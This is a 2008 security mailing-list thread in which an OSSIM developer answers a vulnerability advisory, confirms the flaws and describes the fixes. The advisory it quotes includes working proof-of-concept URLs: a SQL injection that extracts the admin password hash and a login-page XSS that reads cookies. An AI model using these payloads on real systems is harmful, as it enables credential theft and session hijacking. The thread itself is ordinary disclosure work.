Re: SQL-injection, XSS in OSSIM (Open Source Security Informatio
Hello,
I can confirm this affecting earlier versions as well, the XSS has
been fixed some months ago, the SQL Injection (and others) were caused
by a failure in the "punctuation" validation regexp. Just fixed that
one as well as some others.
We're going to release a fixed version asap after stopping development
in order to get a throughout security audit done. The SQL regexp I
just fixed and we'll update the packages today.
Nonetheless, exposure should be minimal since:
a) You aren't going to provide public access to your SIM console,
aren't you ?
b) Regarding the specific SQL injection mentioned in here (as said,
there are more we're going to fix), you shouldn't give access to the
policy section to normal users either.
I must thank you for pointing this out but would've appreciate a more
"direct" contact, as it is considered a polite way of releasing bugs.
Greetings,
Dominique
Am 21.02.2008 um 13:47 schrieb marcin.kopec@hotmail.com:
> Application: OSSIM
> http://www.ossim.net
> Version: 0.9.9rc5
> Note: it is possible that the problem affects also earlier OSSIM
> versions
> Platforms: Linux
> Bug: SQL injection, Cross Site Scripting
> Exploitation: remote
> Date: 21 Feb 2008
> Author: Marcin Kopec
> E-mail: marcin(dot)kopec(at)hotmail(dot)com
>
> ---------------------------------------
>
> 1) Introduction
>
> OSSIM it's a free implementation of Security Information Management
> (SIM) system, equipped with many useful security tools (nessus,
> snort, p0f, ntop, ...) managed from easy-to-use web panel.
>
> 2) SQL injection
>
> The bug exist in portname parameter of modifyportform.php
> It's possible to obtain hashed administrator password when user have
> rights to do port modification in "PORTS" tab.
>
> http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and
> %201=2%20union%20select%20pass,2%20from%20ossim.users%20where
> %20login='admin
>
> 3) XSS
>
> Quotes in OSSIM aren't property sanitized.
> Below XSS may be executed without logging into the OSSIM.
>
> http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript
> %3Ealert(document.cookie)%3C/script%3E%3C!--